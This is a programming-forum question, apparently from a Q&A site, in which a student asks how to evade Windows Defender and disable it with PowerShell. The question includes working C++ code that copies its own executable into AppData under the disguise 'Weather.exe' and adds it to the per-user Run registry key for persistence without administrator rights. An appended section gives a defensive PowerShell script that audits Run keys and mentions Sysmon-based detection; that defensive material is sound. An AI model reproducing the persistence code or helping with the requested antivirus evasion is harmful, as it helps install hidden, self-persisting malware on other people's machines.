Avoid Antivirus detection C++

  antivirus, assembly, c++, malware-detection, windows

For a school project, I'm developing a tiny piece of malware that replicates itself and autoruns via registry keys.

I want my program to set a registry key to autorun, but when I do, Windows Defender detects the RegSetValueExA function from windows.h. I also want my program to run without administrator privileges.

My teacher told me that it's possible to avoid detection: I have to detect when WD looks at my program and tell it to stop/sleep while WD performs the scan. He also told me that it's possible to disable WD with PowerShell. But I don't really know how to do it.

Here’s the code that triggers Windows Defender:

#include <windows.h>
#include <string>
#include <cstring>

using std::string;

// c_user is a Victim member (const char*) holding the current user name.
void Victim::replicateNpersist()
{
  char filename[MAX_PATH];

  // Directory that will contain the copy of the malware
  string Dir = "C:\\Users\\" + string(c_user) + "\\AppData\\Local\\WeatherChannel";
  const char* dirPath = Dir.c_str();

  // Full path of the copy to create
  string Dest = Dir + "\\Weather.exe";
  const char* newLocation = Dest.c_str();

  // Create the directory and copy the running executable into it
  CreateDirectoryA(dirPath, NULL);
  BOOL failIfExists = FALSE;
  DWORD size = GetModuleFileNameA(NULL, filename, MAX_PATH);
  if (size == 0 || size >= MAX_PATH) {
    return;  // could not resolve our own path
  }
  CopyFileA(filename, newLocation, failIfExists);

  // Persistence: the HKCU Run key is writable without administrator privileges
  HKEY hKey;
  LPCSTR keyPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
  LONG lnRes = RegOpenKeyExA(HKEY_CURRENT_USER, keyPath, 0, KEY_WRITE, &hKey);
  if (lnRes == ERROR_SUCCESS) {
    // cbData must include the terminating NUL for REG_SZ
    RegSetValueExA(hKey, "Weather.exe", 0, REG_SZ,
                   (const BYTE*)newLocation, (DWORD)(strlen(newLocation) + 1));
    RegCloseKey(hKey);
  }
}

Source: Windows Questions
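For the defensive side of the same technique: the following is an added example, not code from the question or its author, that audits the Run keys the post writes to (MITRE ATT&CK T1547.001, Registry Run Keys). It lists every autostart value under the per-user and machine Run/RunOnce keys and flags entries whose target lives under a user profile's AppData tree, which is where the code above drops its copy. The AppData path pattern, the function name Get-RunKeyEntries and the column names are my assumptions, not anything taken from the post.

```powershell
# Added example: audit Run-key autostart entries and flag targets that live
# under a user profile's AppData directory. Read-only; no elevation needed
# for the HKCU keys, HKLM keys are readable by standard users as well.
$runKeys = @(
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumed heuristic: an autostart target inside a profile's AppData tree is
# unusual for installed software and worth a closer look.
$suspiciousPattern = '(?i)\\Users\\[^\\]+\\AppData\\'

function Get-RunKeyEntries {
    foreach ($path in $runKeys) {
        if (-not (Test-Path -Path $path)) { continue }
        $key = Get-Item -Path $path
        foreach ($name in $key.GetValueNames()) {
            $target = [string]$key.GetValue($name)
            # Strip surrounding quotes and any arguments to isolate the executable path
            $exe = if ($target -match '^"([^"]+)"') { $Matches[1] } else { ($target -split ' ')[0] }
            [pscustomobject]@{
                Key        = $path
                Name       = $name
                Target     = $target
                Exists     = ($exe -ne '' -and (Test-Path -LiteralPath $exe))
                Suspicious = ($target -match $suspiciousPattern)
            }
        }
    }
}

Get-RunKeyEntries | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Run it in a normal PowerShell session; an entry such as Weather.exe pointing at C:\Users\<name>\AppData\Local\WeatherChannel\Weather.exe comes out with Suspicious set to True. For continuous rather than point-in-time coverage, the write itself is what to watch: Sysmon Event ID 13 (RegistryEvent, value set) records a process setting a value under these keys, which is the kind of behaviour, rather than the mere presence of RegSetValueExA in the import table, that an endpoint product reacts to.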
